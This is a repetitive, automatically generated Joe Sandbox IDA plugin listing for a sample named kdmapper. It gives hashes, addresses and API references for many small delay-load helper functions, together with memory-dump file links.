Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: ac65bbd7ebb46c4e824bc50af48187ac5af051aa90f1217c8aa99a62ae486cbc
Instruction ID: 5d1d743991a05e32525594d2f08cc72a5a3a874e01580f7752932ba1f74cff2d
Opcode Fuzzy Hash: ac65bbd7ebb46c4e824bc50af48187ac5af051aa90f1217c8aa99a62ae486cbc
Instruction Fuzzy Hash: C1B012E5258201FC318461455C06C37010FC4C0F25F30423EFC06C01C0E8526D4506B1

Function 0063E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 29a3bb195f004ffcf4e9f7da28e05908962dd5e529226ebf9ab797f85665f85c
Instruction ID: ea3a061ba9102e19f388b9b382ce8857bc66b5ee819da776ce9f2dd3090bc3f4
Opcode Fuzzy Hash: 29a3bb195f004ffcf4e9f7da28e05908962dd5e529226ebf9ab797f85665f85c
Instruction Fuzzy Hash: 54B012E5258101EC314461451D06C37010FC4C0F25B30413EFC06C01C0EC526E0605B1

Function 0063E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: c1ffae8fa054ee0e579d62b87296adc7e71b05de10039d99a64c618af45494b7
Instruction ID: 30e53cb8693705d4997b6d90367f972b2a0220077be5bbda3d6a43275305ef4f
Opcode Fuzzy Hash: c1ffae8fa054ee0e579d62b87296adc7e71b05de10039d99a64c618af45494b7
Instruction Fuzzy Hash: 1AB012E5258101EC314461461C06C37010FC4C0F25B30413EFC06C01C0E8516D0505B1

Function 0063E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 8807feac78d3e9b87f16a18f604f23dfd3686d2970d4c5f000a8f545ec1469db
Instruction ID: 73aa6d38f5f97442ce35d68f4719333c894ce511ed96bc2540923faa97f04150
Opcode Fuzzy Hash: 8807feac78d3e9b87f16a18f604f23dfd3686d2970d4c5f000a8f545ec1469db
Instruction Fuzzy Hash: 5BB012D5358241FC318462455C06C37010FC4C0F21B30823EFC16C02C0E8516C4907B1

Function 0063E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD, 0063E20A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 4073fd8a7c5bb226b33d8ed690da5be02f90f24f6f58b9250e918d88aed95dc0
Instruction ID: 6ba2ac94647500fa4f7c1591e5263d4aed7d90aee3e91633d9f24c72cb2f345b
Opcode Fuzzy Hash: 4073fd8a7c5bb226b33d8ed690da5be02f90f24f6f58b9250e918d88aed95dc0
Instruction Fuzzy Hash: 35B012D5258101EC314462451D06C37010FC4C0F21B30813EFC06C02C0EC626D0E06B1

Function 0063E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 884fa2ecc0824482ba13e2ceaa5902e846ae8df7bb1230dc547bbd74516f3197
Instruction ID: 3a347936c10df056b000594baf6a3c45ee2d449eb02a91f901698499d96bc5f4
Opcode Fuzzy Hash: 884fa2ecc0824482ba13e2ceaa5902e846ae8df7bb1230dc547bbd74516f3197
Instruction Fuzzy Hash: 5EB012E5258101FC314461451C06C37010FC4C1F25B30813EFC06C01C0E851AD0505B1

Function 0063E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 45c8a18711d4fe2756f3edc51c0b7fae2020d135c79f4aef54e9250500c8d747
Instruction ID: a6699ddb8ff39cf5bd59946ba2b3260d3ec87d803519eaf8d40b076547ed4fe5
Opcode Fuzzy Hash: 45c8a18711d4fe2756f3edc51c0b7fae2020d135c79f4aef54e9250500c8d747
Instruction Fuzzy Hash: 8FB012E5258101EC7144A1451E06C37018FC4C5F21F30413EFC06C01C0EC526D0605B1

Function 0063E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E51F

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

(c, xrefs: 0063E519

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (c
API String ID: 1269201914-4066220940
Opcode ID: 6bf819ad1eb395b86b29c17ff2b2e6b6f59729d501e08984e9754ef602db7b7f
Instruction ID: 01649ba3a8753148f2684e4494ae8122ef075c45f4a46385a6e7e0002aac5119
Opcode Fuzzy Hash: 6bf819ad1eb395b86b29c17ff2b2e6b6f59729d501e08984e9754ef602db7b7f
Instruction Fuzzy Hash: 13B012C1658600BC324465489C03C3B051FC0C1F35B30432EF805C01C0E8430D8915B5

Function 0063E528 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E51F

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

(c, xrefs: 0063E519, 0063E528

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (c
API String ID: 1269201914-4066220940
Opcode ID: 3f695cc7048e3753a37da146dcb562716a2eb1ce8310e7db7730a9f8a1c703e7
Instruction ID: 626938bb33b59a1a64719a7195d04d37804daa94a903cff4be8154653d7a72a5
Opcode Fuzzy Hash: 3f695cc7048e3753a37da146dcb562716a2eb1ce8310e7db7730a9f8a1c703e7
Instruction Fuzzy Hash: B7B012C1698540BC314465481D02C3B090FC0C1F35B30812EF805C42C0E8430D4605B1

Function 0063E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E51F

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

(c, xrefs: 0063E519

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (c
API String ID: 1269201914-4066220940
Opcode ID: cf7dd0abe94d0760edb9dd8d434bbd84f35656aee370b2e8655870c767403abb
Instruction ID: baddbf857022221607e078ba9a4c7443890664a9dbe340e6b040d82e664961fe
Opcode Fuzzy Hash: cf7dd0abe94d0760edb9dd8d434bbd84f35656aee370b2e8655870c767403abb
Instruction Fuzzy Hash: 7EB012C1658500BC310429641C06C3B050FC0C1F35F30413EFC11C04C1A8420E4904B1

Function 0063E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E580

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

F0wnc, xrefs: 0063E57A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: F0wnc
API String ID: 1269201914-3598844980
Opcode ID: a436558f56688620c455316ce5858e007f77b64a6436152578aa6b97ca2a71df
Instruction ID: 03daf4787642f97601a1c5089729cb26124c72c4570b366385b47a2c140a803b
Opcode Fuzzy Hash: a436558f56688620c455316ce5858e007f77b64a6436152578aa6b97ca2a71df
Instruction Fuzzy Hash: 82B012C1658110BC314461949D06C37016FC0C1F35B31832EF805C11C0EC430E0605B5

Function 0063E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E580

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

F0wnc, xrefs: 0063E57A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: F0wnc
API String ID: 1269201914-3598844980
Opcode ID: 2908b604d89e5142a815c392eda4e88f548a71d53e21bd80f85b0123b7eaa814
Instruction ID: ed7dce5f8ffb96a6aeab3d6549d89d1dc61048ec500ecdeade0d42bb18e1abb5
Opcode Fuzzy Hash: 2908b604d89e5142a815c392eda4e88f548a71d53e21bd80f85b0123b7eaa814
Instruction Fuzzy Hash: 14B012C1658210BC31846154DC07C37016FC0C1F35B31832EF805C11C0E8420D4506B5

Function 0063E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E580

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

F0wnc, xrefs: 0063E57A, 0063E593

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: F0wnc
API String ID: 1269201914-3598844980
Opcode ID: ae383624e80c672eb345e42782d9e5c375c61af5cc072635f6718c950b7121cd
Instruction ID: 9d8e7583410c8c44a5e66571aa2db003284cba2d06d8cd14e4842da8daad5e7e
Opcode Fuzzy Hash: ae383624e80c672eb345e42782d9e5c375c61af5cc072635f6718c950b7121cd
Instruction Fuzzy Hash: 38B012C1698110BD314461541C06C37014FC0C1F35B31812EF805C11C0E8420D0505B5

Function 0063E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 7351492e2ada675676f2c7c05759a8973cd39e040ba6b62247ddadb4fb4f5998
Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
Opcode Fuzzy Hash: 7351492e2ada675676f2c7c05759a8973cd39e040ba6b62247ddadb4fb4f5998
Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5

Function 0063E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 1da4708750b03ce9609979014a29840680233057a9260b6bf09d1f355acc6146
Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
Opcode Fuzzy Hash: 1da4708750b03ce9609979014a29840680233057a9260b6bf09d1f355acc6146
Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5

Function 0063E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: a1b7b41d7bffb215012b837395f6c823b75e5dcc4e42c4244e2c6ef31fc8380d
Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
Opcode Fuzzy Hash: a1b7b41d7bffb215012b837395f6c823b75e5dcc4e42c4244e2c6ef31fc8380d
Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5

Function 0063E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

